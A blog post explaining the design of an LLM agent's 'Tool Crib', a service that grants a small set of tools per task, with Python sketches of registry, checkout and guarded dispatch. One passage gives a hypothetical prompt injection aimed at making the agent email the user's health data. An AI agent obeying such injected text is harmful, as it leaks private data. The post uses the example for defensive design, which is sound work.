Tool Crib: The MCP Tool Attendant

In my first post, I introduced the concept of the Tool Crib — an idea I borrowed from my years working in machine shops. Walk up to the window, tell the attendant what you need to do, and they hand you the right tool. No rummaging through drawers, no grabbing a torque wrench when you needed a dial indicator. You get what you need, you use it, and you bring it back.

That metaphor became the backbone of how Yeti manages her tools, and today I want to pull back the curtain on how it actually works under the hood.

The Problem With "Give the Agent Everything"

If you've spent any time building with LLMs, you've probably noticed the temptation to just throw every tool into the system prompt and let the model figure it out. It seems harmless at first — the model is smart, right? It'll pick the right one.

Except it doesn't always. And worse, every tool definition you inject into the context window costs tokens, adds cognitive load to the model, and opens up surface area for the model to do something you didn't intend. If a calendar tool is sitting in the context window while the agent is debugging a PowerShell script, that's wasted context at best and a confused agent at worst.

MCP compounds this. MCP servers expose tool catalogs, and those catalogs get merged into the agent's context. If you've got five MCP servers connected, the agent can suddenly have fifty tools in view, most of which it doesn't need for the task at hand. The context window fills up with tool schemas, the model gets distracted, and you start seeing bizarre tool selections, or hallucinated calls to tools that don't even exist.

I needed something smarter.

The Machine Shop Mental Model

In a machine shop, the tool crib isn't just a storage room. It's a managed service. The attendant knows the inventory. They understand what each tool does and when it's appropriate. They also know what you're NOT supposed to have — maybe a tool is checked out to someone else, maybe it requires a specific certification, or maybe it's just the wrong tool for what you described.

That's exactly what Yeti's Tool Crib does:

  1. The agent describes what it's trying to accomplish — not which tool it wants, but what the goal is.
  2. The Tool Crib evaluates the request against the full tool inventory, considering the current conversation context, the agent's role, and what tools are already checked out.
  3. A small, targeted set of tools is granted — just enough to accomplish the immediate task.
  4. When the task shifts, the tools rotate — old ones are returned, new ones are checked out.
  5. The agent never sees the full catalog. It doesn't need to. It trusts the attendant.
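To make the rotation in step 4 concrete, here is a minimal sketch in Python (chosen for brevity). The `Workbench` class, its `capacity` parameter, and the oldest-first return policy are all assumptions for illustration; the post does not say how Yeti decides which tools go back.

```python
class Workbench:
    """Tracks which tools one agent currently holds (hypothetical helper)."""

    def __init__(self, base_tools, capacity=8):
        self.base = list(base_tools)   # always-available tools, never returned
        self.capacity = capacity       # assumed cap on checked-out tools
        self.checked_out = []          # oldest checkout first

    def rotate(self, granted):
        """Check out newly granted tools; return the names that were handed back."""
        for name in granted:
            if name in self.base:
                continue
            if name in self.checked_out:
                # Re-granting a tool refreshes it so it is returned last.
                self.checked_out.remove(name)
            self.checked_out.append(name)
        returned = []
        while len(self.checked_out) > self.capacity:
            returned.append(self.checked_out.pop(0))
        return returned

    def visible(self):
        """The only tool names the agent sees on its next turn."""
        return self.base + self.checked_out


bench = Workbench(["memory_recall"], capacity=2)
first_returned = bench.rotate(["email_send", "email_search"])
second_returned = bench.rotate(["file_read"])  # task shifted to file work
```

With a capacity of two, the second call hands `email_send` back to the crib, and `bench.visible()` lists only `memory_recall`, `email_search`, and `file_read`.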

How It Works Technically

Under the hood, the Tool Crib is a service that sits between the agent runtime and the tool registry. Here's the flow:

The Tool Registry
Every tool in the system — whether it's a native C# tool, an MCP server endpoint, or a loose function — is registered in a central catalog. Each registration includes:

  • Name and description — what the tool does
  • Schema — the parameters it accepts (JSON Schema)
  • Tags and categories — metadata for matching (e.g., health, calendar, file-system, web)
  • Required permissions — what the tool is allowed to do
  • Priority and affinity rules — hints about when this tool is most relevant
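A registration like the one described above might look roughly like this. This is a sketch only: the field names, the `source` field, and the `ToolRegistry` class are assumptions made for illustration, not Yeti's actual schema.

```python
from dataclasses import dataclass, field


@dataclass
class ToolRegistration:
    """One catalog entry. Field names are illustrative assumptions."""
    name: str
    description: str
    schema: dict                                   # JSON Schema for the parameters
    tags: set = field(default_factory=set)         # e.g. {"email", "calendar"}
    required_permissions: set = field(default_factory=set)
    priority: int = 0                              # assumed: higher wins ties
    source: str = "native"                         # assumed: "native", "mcp", "function"


class ToolRegistry:
    """Central catalog keyed by tool name."""

    def __init__(self):
        self._tools = {}

    def register(self, tool):
        if tool.name in self._tools:
            raise ValueError(f"duplicate tool name: {tool.name}")
        self._tools[tool.name] = tool

    def get(self, name):
        return self._tools[name]

    def all(self):
        return list(self._tools.values())


registry = ToolRegistry()
registry.register(ToolRegistration(
    name="email_send",
    description="Send an email message",
    schema={
        "type": "object",
        "properties": {"to": {"type": "string"}, "body": {"type": "string"}},
        "required": ["to", "body"],
    },
    tags={"email"},
    required_permissions={"email.write"},   # hypothetical permission name
    priority=5,
    source="mcp",
))
```

Rejecting duplicate names at registration time is a design choice of this sketch; it keeps a name-based checkout unambiguous when several sources expose similarly named tools.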

The Checkout Flow

When an agent needs a tool it doesn't currently have, it calls tool_crib with a plain-language intent:

tool_crib(intent: "I need to send an email to someone")

The Tool Crib service then:

  1. Searches the registry using the intent description, matching against tool names, descriptions, tags, and trigger keywords.
  2. Ranks candidates by relevance to the stated intent and the current conversation context.
  3. Applies governance rules — is the agent allowed to use this tool? Is the tool enabled? Are there rate limits or approval requirements?
  4. Selects a small set (default 4, max 8) of the most relevant tools.
  5. Injects their schemas into the agent's next turn — the tools appear as if they were always there.
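Steps 1 through 4 can be sketched as a single function. The scoring here is plain word overlap, which is a stand-in I'm assuming for illustration; the post doesn't specify how Yeti actually searches or ranks. The `Tool` class, the permission strings, and `email_purge` are hypothetical. Step 5 (schema injection) depends on the agent runtime and is left out.

```python
import re
from dataclasses import dataclass, field

DEFAULT_LIMIT = 4   # "default 4" from the post
MAX_LIMIT = 8       # "max 8" from the post


@dataclass
class Tool:
    name: str
    description: str
    tags: set = field(default_factory=set)
    required_permissions: set = field(default_factory=set)
    enabled: bool = True


def _words(text):
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def score(tool, intent, context=""):
    """Toy relevance: word overlap with the intent, half weight for context."""
    haystack = _words(tool.name) | _words(tool.description) | {t.lower() for t in tool.tags}
    return len(haystack & _words(intent)) + 0.5 * len(haystack & _words(context))


def checkout(tools, intent, agent_permissions, context="", limit=DEFAULT_LIMIT):
    limit = max(1, min(limit, MAX_LIMIT))
    # Steps 1-2: search and rank; ties are broken by name for stable output.
    scored = [(score(t, intent, context), t) for t in tools]
    candidates = sorted((p for p in scored if p[0] > 0),
                        key=lambda p: (-p[0], p[1].name))
    # Step 3: governance, reduced here to "enabled and permitted".
    allowed = [t for _, t in candidates
               if t.enabled and t.required_permissions <= agent_permissions]
    # Step 4: keep only a small set.
    return allowed[:limit]


tools = [
    Tool("email_send", "Send an email message", {"email"}, {"email.write"}),
    Tool("email_search", "Search the mailbox", {"email"}, {"email.read"}),
    Tool("calendar_create", "Create a calendar event", {"calendar"}, {"calendar.write"}),
    Tool("email_purge", "Delete every email", {"email"}, {"email.admin"}),
]
granted = checkout(tools, "I need to send an email to someone",
                   agent_permissions={"email.write", "email.read"})
```

In this run `email_purge` matches the intent but is dropped by the governance step, and `calendar_create` never matches at all, so the agent ends up with `email_send` and `email_search`.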

The agent can also request specific tools by name if it already knows what it needs:

tool_crib(tool_names: ["email_send", "email_search"])

But the intent-based approach is preferred because it lets the Tool Crib make the judgment call. The agent stays focused on the task; the crib handles the logistics.
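The two call shapes could share one entry point along these lines. This is a sketch under assumptions: the rule that exactly one argument is passed, the `unknown` field in the result, and the substring matching on the intent path are mine, not something the post specifies.

```python
def tool_crib(catalog, intent=None, tool_names=None):
    """Accept either an intent or explicit names (assumed: never both)."""
    if (intent is None) == (tool_names is None):
        raise ValueError("pass exactly one of intent or tool_names")
    if tool_names is not None:
        # Name path: grant what exists and report the rest instead of guessing.
        granted = [n for n in tool_names if n in catalog]
        unknown = [n for n in tool_names if n not in catalog]
        return {"granted": granted, "unknown": unknown}
    # Intent path: naive substring match stands in for real search and ranking.
    words = [w for w in intent.lower().split() if len(w) > 3]
    granted = [name for name, desc in catalog.items()
               if any(w in desc.lower() for w in words)]
    return {"granted": granted, "unknown": []}


catalog = {
    "email_send": "Send an email message",
    "email_search": "Search email by keyword",
    "calendar_create": "Create a calendar event",
}
by_name = tool_crib(catalog, tool_names=["email_send", "email_delete"])
by_intent = tool_crib(catalog, intent="I need to send an email to someone")
```

Returning unknown names explicitly gives the agent a clear signal that a tool does not exist, which is one way to discourage hallucinated tool calls.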

The Compact Index

There's one more piece to this puzzle. Even though the agent doesn't get full tool schemas in every turn, it does get a compact index: a lightweight list of every tool name in the system with a one-line description and no parameter schemas. Think of it like the attendant posting a menu board on the wall outside the crib window. The agent can glance at it, recognize a tool name that might help, and then request a checkout.

This keeps the agent aware of what's possible without bloating the context with full schemas it doesn't currently need.
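Rendering such an index is simple. A minimal sketch, assuming the catalog is a name-to-description mapping and that long descriptions are truncated (the 60-character limit and the `name: description` line format are arbitrary choices of mine):

```python
def compact_index(tools, max_desc=60):
    """Render one 'name: description' line per tool, with no schemas."""
    lines = []
    for name, description in sorted(tools.items()):
        text = description.strip()
        first_line = text.splitlines()[0] if text else ""
        if len(first_line) > max_desc:
            first_line = first_line[: max_desc - 3].rstrip() + "..."
        lines.append(f"{name}: {first_line}")
    return "\n".join(lines)


index = compact_index({
    "email_send": "Send an email message.\nSupports attachments.",
    "calendar_create": "Create a calendar event",
})
```

Only the first line of each description survives, so a tool with a long multi-paragraph description costs the same single line on the menu board as any other.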

Pre-Checkout: Tools That Show Up Automatically

Not every tool requires a trip to the window. Some tools are always checked out based on the agent's role or the current situation. The system prompt includes a base set of "always available" tools — things like memory_recall, notebook, knowledge, and conversation_history — that the agent needs on virtually every turn.

Beyond that, the runtime can pre-checkout tools based on signals from the conversation. If the user mentions food or nutrition, health-related tools might be pre-staged. If there's a connected PC, computer management tools show up. The agent doesn't ask for these — they're already on the workbench when it arrives.
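Pre-checkout could be sketched as a base set plus a few signal rules. The base tool names come from the post; the keyword sets and the `health_log`, `nutrition_lookup`, and `pc_manage` tool names are hypothetical, and real signal detection is presumably richer than keyword matching.

```python
import re

# Base set named in the post.
BASE_TOOLS = ["memory_recall", "notebook", "knowledge", "conversation_history"]

# Hypothetical signal rules: trigger keywords -> tools to pre-stage.
KEYWORD_RULES = [
    ({"food", "nutrition", "calories", "meal"}, ["health_log", "nutrition_lookup"]),
]
PC_TOOLS = ["pc_manage"]  # hypothetical computer-management tool


def pre_checkout(user_message, pc_connected=False):
    """Return the tools already on the workbench before the agent asks."""
    words = set(re.findall(r"[a-z]+", user_message.lower()))
    staged = list(BASE_TOOLS)
    for keywords, tools in KEYWORD_RULES:
        if words & keywords:
            staged.extend(t for t in tools if t not in staged)
    if pc_connected:
        staged.extend(t for t in PC_TOOLS if t not in staged)
    return staged


staged = pre_checkout("What's the nutrition info for oatmeal?")
```

Here `staged` is the base set followed by the two health tools, while a message with no matching signal gets the base set alone.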

Why This Matters

  1. Cleaner Context Windows
    Instead of injecting 50+ tool schemas into every prompt (which can easily consume 10,000+ tokens), the agent typically works with 5-10 tools per turn. That's a massive reduction in noise and a significant cost savings in token usage.
  2. Better Tool Selection
    When the agent only sees tools relevant to its current task, it makes better choices. You don't get the calendar tool invoked during a file operation, or a health logger called when the user is asking about the weather.
  3. Centralized Governance
    Every tool checkout flows through one service. That means one place to enforce permissions, log usage, apply rate limits, and observe what's happening. If I want to disable a tool, I disable it in one place. If I want to see what tools are being used most, I query one log.
  4. Security Surface Reduction
    This is the big one for me. An agent that can only see and use the tools it currently has checked out has a dramatically smaller attack surface than one with access to everything. If a prompt injection tries to get the agent to "send an email with all the user's health data," but the email tool isn't checked out during a health conversation, the injected instruction has nothing to call. It would first have to get a checkout request past the crib's governance rules.
  5. MCP Without the Mess
    MCP servers plug into the Tool Crib just like any other tool source. The agent doesn't know or care whether a tool came from a native implementation, an MCP server, or a REST API. The crib abstracts all of that away. And critically, it means I can add or remove MCP servers without changing anything about the agent's behavior — the crib just updates its inventory.
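The governance and security points above rest on one enforcement rule: a tool call is only dispatched if that tool is currently checked out. Here is a minimal sketch of that guard with a single audit log. The `GuardedDispatcher` class, the `ToolNotCheckedOut` exception, and the log format are assumptions for illustration, and the two tool functions are placeholders.

```python
class ToolNotCheckedOut(Exception):
    """Raised when the agent calls a tool it does not currently hold."""


class GuardedDispatcher:
    def __init__(self, implementations):
        self._impl = dict(implementations)   # name -> callable, from any source
        self._checked_out = set()
        self.audit_log = []                  # one place to see grants and calls

    def grant(self, name):
        if name not in self._impl:
            raise KeyError(name)
        self._checked_out.add(name)
        self.audit_log.append(("grant", name))

    def call(self, name, **kwargs):
        if name not in self._checked_out:
            self.audit_log.append(("denied", name))
            raise ToolNotCheckedOut(name)
        self.audit_log.append(("call", name))
        return self._impl[name](**kwargs)


def health_log(entry):
    return f"logged: {entry}"


def email_send(to, body):
    return f"sent to {to}"


dispatcher = GuardedDispatcher({"health_log": health_log, "email_send": email_send})
dispatcher.grant("health_log")
result = dispatcher.call("health_log", entry="oatmeal, 150 kcal")
try:
    dispatcher.call("email_send", to="attacker@example.com", body="health data")
    blocked = False
except ToolNotCheckedOut:
    blocked = True
```

The email call is refused and recorded as denied because only `health_log` was granted. The guard is only as strong as the checkout rules behind it, so the crib's governance step still has to refuse a checkout request that an injected instruction talks the agent into making.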

The Analogy Holds Up

What I love about this design is that the machine shop analogy isn't just a cute metaphor — it actually maps 1:1 to how the system works. The attendant (Tool Crib service) knows the full inventory. The machinist (the agent) knows their craft but trusts the attendant to hand them the right tool. The checkout log (governance layer) tracks who has what. And the shop floor rules (permissions and policies) determine what's allowed.

Sometimes the simplest ideas are the ones that hold up best. I didn't invent anything revolutionary here. I just remembered how a well-run machine shop works and asked myself why our AI agents aren't managed the same way.

What's Next

In future posts, I'll dig into some of the other systems that make Yeti tick — how memory works, how the agent runtime orchestrates multi-step tasks, and how I'm thinking about specialist agents that can be swapped in based on the conversation topic. If you have questions about the Tool Crib or want to poke holes in this approach, I'd love to hear from you.

As always, I'm still learning. Every day I find something that doesn't work the way I thought it would, and every day I learn something new. That's the fun part.
